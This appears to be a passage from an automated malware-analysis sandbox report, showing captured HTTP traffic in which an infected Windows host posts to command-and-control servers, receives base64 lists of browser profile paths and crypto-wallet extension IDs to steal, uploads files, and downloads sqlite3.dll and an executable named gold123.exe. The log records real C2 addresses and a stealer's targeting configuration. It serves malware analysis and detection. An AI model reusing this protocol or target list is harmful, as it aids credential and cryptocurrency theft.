                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="message"browsers------DHDHCGHDHIDHCBGCBGCA--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.715579987 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:11 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 2028
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.715595007 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                  Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.716902971 CET468OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 267
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="message"plugins------BAKEBAFIIECBGCAAAAFC--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920454979 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:11 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 7116
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920464993 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                  Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920471907 CET448INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                                  Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920594931 CET1236INData Raw: 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 72 61 6d 31 76 62 32
                                                                                                                                                                                                                                                  Data Ascii: b2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWlvamZsamNraWxoaGxoY2p8MXw
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920605898 CET1236INData Raw: 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32
                                                                                                                                                                                                                                                  Data Ascii: fEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmh
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920617104 CET1236INData Raw: 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47
                                                                                                                                                                                                                                                  Data Ascii: amlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXw
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920630932 CET716INData Raw: 61 48 4a 76 62 57 6c 31 62 58 78 6a 61 57 39 71 62 32 4e 77 61 32 4e 73 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47
                                                                                                                                                                                                                                                  Data Ascii: aHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJ
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173218966 CET469OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBA
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 268
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32 31 63 38 38 39 33 63 33 64 63 66 32 61 37 32 30 35 39 38 63 61 38 64 37 62 63 62 37 33 64 34 39 38 36 35 36 36 37 34 66 65 30 61 65 63 39 30 62 65 61 32 34 33 39 64 35 64 37 34 36 34 35 63 62 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="message"fplugins------DHIDHIEGIIIECAKEBFBA--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.376507998 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:12 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 108
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                  Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.401617050 CET202OUTPOST /ee45b7c5e4cb75cb.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFC
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Content-Length: 5255
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.401649952 CET5255OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 45 47 48 4a 45 47 49 44 47 43 41 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 31 33 31 32
                                                                                                                                                                                                                                                  Data Ascii: ------EGDGIEGHJEGIDGCAFBFCContent-Disposition: form-data; name="token"ba13121c8893c3dcf2a720598ca8d7bcb73d498656674fe0aec90bea2439d5d74645cb86------EGDGIEGHJEGIDGCAFBFCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.622695923 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:12 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.628684998 CET93OUTGET /4a21a126be249f0d/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 135.181.65.216
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.831101894 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:12 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                  ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 1106998
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.831113100 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.831123114 CET448INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                                  Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.449820185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.961673975 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 30 38 36 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1008659001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.680953979 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:10 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.685461998 CET55OUTGET /inc/gold123.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910634041 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:10 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 926760
